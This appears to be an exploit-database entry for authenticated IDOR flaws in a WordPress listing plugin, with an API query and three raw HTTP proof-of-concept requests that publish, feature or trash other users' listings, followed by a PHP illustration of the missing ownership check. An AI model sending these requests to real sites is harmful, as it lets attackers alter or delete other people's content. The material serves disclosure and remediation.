## https://sploitus.com/exploit?id=WPEX-ID:0DED523A-3C12-4F5F-89D7-6A24F0CE5D6A
Important: the user_id and listing_id values are dependent on each other, i.e. if the author ID == 4, data can only be modified for those ADs and pages that belong to that particular ID. The author of an AD/page/post and their ID can be found, e.g., in the source code of the AD page or via the API.

Get all custom ADs via API: https://example.com/1/api/my-listing/list?status=all&user_id=-1&query_var[]=&listing_type=-1&pagination_settings[maxPagesToShow]=-1

PoC #1 | Authenticated IDOR | Publish AD:

POST /1/api/ulisting-user/draft_or_delete HTTP/2
Host: example.com
Cookie: [user cookies]
User-Agent: Mozilla/5.0
Content-Type: application/json;charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 74

{"user_id":262,"listing_id":"904","status":"publish","nonce":"23dfa4aa88"}


PoC #2 | Authenticated IDOR | Featured option:

POST /1/api/ulisting-listing/set-feature HTTP/2
Host: example.com
Cookie: [user cookies]
User-Agent: Mozilla/5.0
Content-Type: application/json;charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 74

{"listing_id":"904","plan_id":true}


PoC #3 | Authenticated IDOR | Delete page:

POST /1/api/ulisting-user/draft_or_delete HTTP/2
Host: example.com
Cookie: [user cookies]
User-Agent: Mozilla/5.0
Content-Type: application/json;charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 71

{"user_id":0,"listing_id":"2","status":"trash","nonce":"23dfa4aa88"}
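The root cause in all three PoCs is that the endpoint trusts the client-supplied user_id and only checks that it matches the listing's author, instead of checking the listing against the logged-in session. Below is an added illustration of the server-side check such a WordPress handler needs; it is not uListing's own code, the handler and nonce action names are hypothetical, and it assumes listings are stored as posts with post_author set to the owner.

```php
<?php
// Added illustration, not the plugin's code. Function name and the nonce
// action 'example_listing_status' are hypothetical; WordPress API calls are real.

function example_handle_listing_status_change() {
    $body = json_decode( file_get_contents( 'php://input' ), true );
    if ( ! is_array( $body ) ) {
        wp_send_json_error( array( 'message' => 'bad request' ), 400 );
    }

    // 1. Identity comes from the session only. The "user_id" field that the
    //    PoCs send in the JSON body is never read.
    $current_user = get_current_user_id();
    if ( 0 === $current_user ) {
        wp_send_json_error( array( 'message' => 'login required' ), 401 );
    }

    // 2. wp_verify_nonce() binds the nonce to the current user and session,
    //    so one captured value cannot be replayed across accounts.
    $nonce = isset( $body['nonce'] ) ? (string) $body['nonce'] : '';
    if ( ! wp_verify_nonce( $nonce, 'example_listing_status' ) ) {
        wp_send_json_error( array( 'message' => 'invalid nonce' ), 403 );
    }

    // 3. The listing must exist and must be owned by the authenticated user
    //    (or the user must hold the edit_post capability for that specific post).
    $listing_id = isset( $body['listing_id'] ) ? absint( $body['listing_id'] ) : 0;
    $listing    = get_post( $listing_id );
    if ( ! $listing ) {
        wp_send_json_error( array( 'message' => 'not found' ), 404 );
    }
    $owns = ( (int) $listing->post_author === $current_user );
    if ( ! $owns && ! current_user_can( 'edit_post', $listing_id ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }

    // 4. Only an explicit allow-list of status transitions is applied.
    $status = isset( $body['status'] ) ? (string) $body['status'] : '';
    if ( ! in_array( $status, array( 'publish', 'draft', 'trash' ), true ) ) {
        wp_send_json_error( array( 'message' => 'bad status' ), 400 );
    }
    if ( 'trash' === $status ) {
        $result = wp_trash_post( $listing_id );
    } else {
        $result = wp_update_post( array( 'ID' => $listing_id, 'post_status' => $status ), true );
    }
    if ( ! $result || is_wp_error( $result ) ) {
        wp_send_json_error( array( 'message' => 'update failed' ), 500 );
    }
    wp_send_json_success( array( 'listing_id' => $listing_id, 'status' => $status ) );
}
```

The same ownership check (step 3) applies to the set-feature endpoint in PoC #2, which takes no user_id at all and so has nothing but the session to authorize against.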